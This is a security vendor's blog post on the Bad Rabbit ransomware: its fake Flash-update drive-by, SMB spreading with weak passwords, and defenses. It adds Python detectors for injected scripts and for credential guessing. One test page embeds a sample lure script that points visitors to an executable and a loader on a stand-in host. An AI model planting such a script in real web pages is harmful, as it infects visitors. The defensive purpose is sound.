Bad Rabbit Ransomware: A Cybersecurity Threat

January 18, 2024 in Malware, Website Security

Back in 2017, a ransomware outbreak paralyzed several organizations in Russia and Ukraine, with cases also occurring in Turkey, Germany, Bulgaria, and Japan.

Kaspersky Lab's researchers identified it during an attack on Russian media outlets that knocked their servers offline. It also hit transportation-sector organizations in Ukraine: an airport had to process passenger data by hand, delaying flights, and the Kiev metro's customer payment terminals were disrupted.

The malware became known as Bad Rabbit ransomware and was the third major ransomware outbreak of that year, after WannaCry and NotPetya. In the days after the initial outbreak, researchers were unsure what exactly Bad Rabbit was and how it related to the earlier campaigns.

So, what is Bad Rabbit ransomware—and what does Bad Rabbit do?

What is Bad Rabbit ransomware?

Bad Rabbit is similar to WannaCry and Petya/NotPetya: it targets Microsoft Windows systems, spreads across a network on its own once it has a foothold, encrypts files, and demands cryptocurrency (Bitcoin) for decryption. Unlike WannaCry, though, its initial entry did not come from an exposed network service but from a user running a fake installer.

Bad Rabbit reached its victims through drive-by downloads from compromised, otherwise legitimate websites rather than through phishing email. The dropper was disguised as an Adobe Flash Player installer, so a visitor to a compromised site could be infected simply by accepting what looked like a routine Flash update.

The compromised sites did not host the ransomware itself. The attackers injected JavaScript into each site's HTML; that script displayed the fake update prompt and fetched the dropper from the attackers' own server. So, while a person believes they are visiting a safe website, a malware dropper is pulled from the threat actor's infrastructure onto their computer. Some researchers believe the initial outbreak was a targeted operation that may have been months in the making, but that has not been confirmed.
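How such an injection can be spotted on the website side, as an added example that is not SiteLock's scanner and not code from the original post: the Python below parses a page, collects every script tag, flags external scripts loaded from hosts outside an allow-list, and flags inline scripts that carry the traits of a fake-update lure. The allow-list, the lure patterns, their labels and both sample pages are constructed for the example and are assumptions, not data from a real compromise.

```python
"""Flag script injections of the kind used for drive-by 'fake update' lures.

Added example (not SiteLock's scanner). Everything here is illustrative:
the allow-list, the lure patterns and the sample pages are assumptions.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts this site legitimately loads scripts from (assumed for the example).
ALLOWED_HOSTS = {"cdn.example.com"}

# Traits of injected lure scripts: a player-update message, a link to an
# executable, or obfuscation wrappers. Labels are ours, not a vendor taxonomy.
LURE_PATTERNS = [
    ("flash-player lure", re.compile(r"flash\s*player", re.I)),
    ("link to executable", re.compile(r"\.exe\b", re.I)),
    ("eval/obfuscation", re.compile(r"\b(eval|atob|unescape)\s*\(", re.I)),
    ("dom rewrite", re.compile(r"document\.write\s*\(", re.I)),
]


class _ScriptCollector(HTMLParser):
    """Collect <script src=...> URLs and inline <script> bodies."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._in_script = False


def find_suspicious_scripts(html, allowed_hosts=ALLOWED_HOSTS):
    """Return findings for scripts that do not belong on the page."""
    parser = _ScriptCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for src in parser.external:
        host = urlparse(src).hostname
        if host is None:
            continue  # relative URL: served by the site itself
        if host.lower() not in allowed_hosts:
            findings.append({"kind": "external", "detail": src,
                             "reasons": ["script from unknown host"]})
    for body in parser.inline:
        reasons = [label for label, pat in LURE_PATTERNS if pat.search(body)]
        if reasons:
            findings.append({"kind": "inline", "detail": body.strip()[:80],
                             "reasons": reasons})
    return findings


# Constructed sample pages (not captured from a real site).
CLEAN_PAGE = """<html><head>
<script src="/js/app.js"></script>
<script src="https://cdn.example.com/jquery.min.js"></script>
</head><body><h1>News</h1></body></html>"""

# Same page with an injected lure script and a loader from an unknown host.
INFECTED_PAGE = CLEAN_PAGE.replace("</body>", """
<script>
var d=document.createElement('div');
d.textContent='Your Flash Player is out of date. Click to update.';
d.onclick=function(){location.href='http://updates.invalid/install_flash_player.exe';};
document.body.appendChild(d);
</script>
<script src="http://updates.invalid/loader.js"></script>
</body>""")

if __name__ == "__main__":
    for page_name, page in (("clean", CLEAN_PAGE), ("infected", INFECTED_PAGE)):
        print(page_name, find_suspicious_scripts(page))
```

Run against a copy of each page's HTML on a schedule and diff the findings against the previous run; a script tag that was not there yesterday is the signal, regardless of whether the lure patterns happen to match.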

How does an attack work?

Now that you have a better understanding of Bad Rabbit ransomware—what does Bad Rabbit do?

The downloaded file does nothing on its own: the victim has to run the fake installer, and that is the step that starts the infection. Once run, it encrypts files and shows a ransom note and a payment page demanding a set amount of Bitcoin within a 40-hour countdown, after which the price rises. The note warns that "no one will be able to recover files without our decryption service."

Once Bad Rabbit has infected a computer, it tries to spread to other machines over the network's SMB file-sharing connections. It carries a built-in list of common usernames and weak passwords (e.g., 1111, Password, Guest123) and tries them against neighboring hosts, alongside credentials it harvests from the infected machine itself. Wherever a combination works, it copies itself over, encrypts that host's files, and repeats the process from there.
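What that spreading stage looks like in Windows logon events, and how a defender can catch it, as an added example that is not Bad Rabbit's code and not from the original post. The event lines are a constructed, simplified stand-in for Windows Security log entries (4625 = failed logon, 4624 = successful logon, logon type 3 = network logon, which is how SMB connections are recorded); the thresholds and the host names are assumptions to tune per environment.

```python
"""Detect an infected host guessing credentials against its neighbors.

Added example (not code from the page or from any vendor). The event
format below is a simplified, constructed stand-in for Windows Security
log entries (4625 = failed logon, 4624 = successful logon, logon type 3 =
network logon, which is how SMB connections appear).
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: timestamp|event_id|source_workstation|target_user|logon_type
# WS-17 behaves like a Bad Rabbit host working through a built-in credential list
# and finally getting in as "Admin"; WS-02 is an interactive user mistyping a
# password; WS-09 is two stray network failures, below any sensible threshold.
SAMPLE_EVENTS = """\
2017-10-24T13:00:01|4625|WS-17|Administrator|3
2017-10-24T13:00:01|4625|WS-17|Guest|3
2017-10-24T13:00:02|4625|WS-17|User|3
2017-10-24T13:00:02|4625|WS-17|root|3
2017-10-24T13:00:03|4625|WS-17|Admin|3
2017-10-24T13:00:03|4625|WS-17|Test|3
2017-10-24T13:00:04|4624|WS-17|Admin|3
2017-10-24T13:02:10|4625|WS-09|jsmith|3
2017-10-24T13:02:40|4625|WS-09|jsmith|3
2017-10-24T13:05:00|4625|WS-02|jsmith|2
2017-10-24T13:05:30|4624|WS-02|jsmith|2
"""


def parse_events(text):
    """Parse the pipe-delimited sample format into sorted event dicts."""
    events = []
    for line in text.strip().splitlines():
        ts, event_id, source, user, logon_type = line.split("|")
        events.append({"ts": datetime.fromisoformat(ts), "id": int(event_id),
                       "src": source, "user": user, "type": int(logon_type)})
    events.sort(key=lambda e: e["ts"])  # stable sort: ties keep file order
    return events


def detect_guessing(events, window=timedelta(minutes=2), min_failures=5, min_users=3):
    """One alert per source host that fails many network logons with many
    different usernames inside `window`; records any success that followed."""
    by_src = defaultdict(list)
    for e in events:
        if e["type"] == 3:  # network logons only: that is how SMB spreading shows up
            by_src[e["src"]].append(e)

    alerts = []
    for src, evs in by_src.items():
        fails = [e for e in evs if e["id"] == 4625]
        start = 0
        for end in range(len(fails)):
            # Sliding window over this source's failed logons.
            while fails[end]["ts"] - fails[start]["ts"] > window:
                start += 1
            burst = fails[start:end + 1]
            if len(burst) < min_failures or len({e["user"] for e in burst}) < min_users:
                continue
            # Threshold crossed: take every failure within the window of the burst start.
            burst = [e for e in fails[start:] if e["ts"] - fails[start]["ts"] <= window]
            deadline = burst[-1]["ts"] + window
            success = next((e for e in evs if e["id"] == 4624
                            and burst[0]["ts"] <= e["ts"] <= deadline), None)
            alerts.append({"source": src,
                           "failures": len(burst),
                           "distinct_users": len({e["user"] for e in burst}),
                           "first": burst[0]["ts"].isoformat(),
                           "last": burst[-1]["ts"].isoformat(),
                           "success_user": success["user"] if success else None})
            break  # one alert per source is enough to trigger isolation
    return alerts


if __name__ == "__main__":
    for alert in detect_guessing(parse_events(SAMPLE_EVENTS)):
        print(alert)
```

The decisive field is `success_user`: a burst of failures across many accounts followed by a network logon from the same source means the guessing worked and the target host should be isolated along with the source. Real deployments would read these events from the domain controllers or a SIEM rather than a string, and would tune the window and thresholds to the normal rate of 4625 events on that network.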

Ransomware protection

Companies can reduce the risk posed by ransomware attacks, Bad Rabbit included, with a few straightforward measures.

  1. Only download software updates from the vendor's own site (for Adobe products, from adobe.com), never from a prompt that appears on a third-party website. Adobe Flash Player itself reached end of life at the end of 2020 and should no longer be installed at all.
  2. Perform regular backups, keep at least one copy offline or otherwise isolated from the network, and test restoring from them.
  3. Enforce strong password controls; Bad Rabbit's lateral movement depends on guessing weak, reused local credentials.
  4. Keep antivirus and endpoint protection software updated.
  5. Segment the corporate network so that one infected workstation cannot reach every other host over SMB.

At the time of the outbreak, Bad Rabbit had not been widely reported among U.S. companies, but organizations everywhere should brief their employees on this style of fake-update lure and stay alert for similar outbreaks.

Stay protected with SiteLock

Now that you know what Bad Rabbit ransomware is, discover other ways that hackers hold sites hostage—and what you can do to ensure your site isn’t one of them. Or, check out our comprehensive security solutions against a wide range of cyberthreats, including ransomware.

SiteLock's advanced technology scans your website for vulnerabilities, detects malicious software, and effectively blocks or removes malware. By employing SiteLock's proactive security measures, you can ensure the safety and integrity of your website, keeping your data secure and your operations running smoothly.
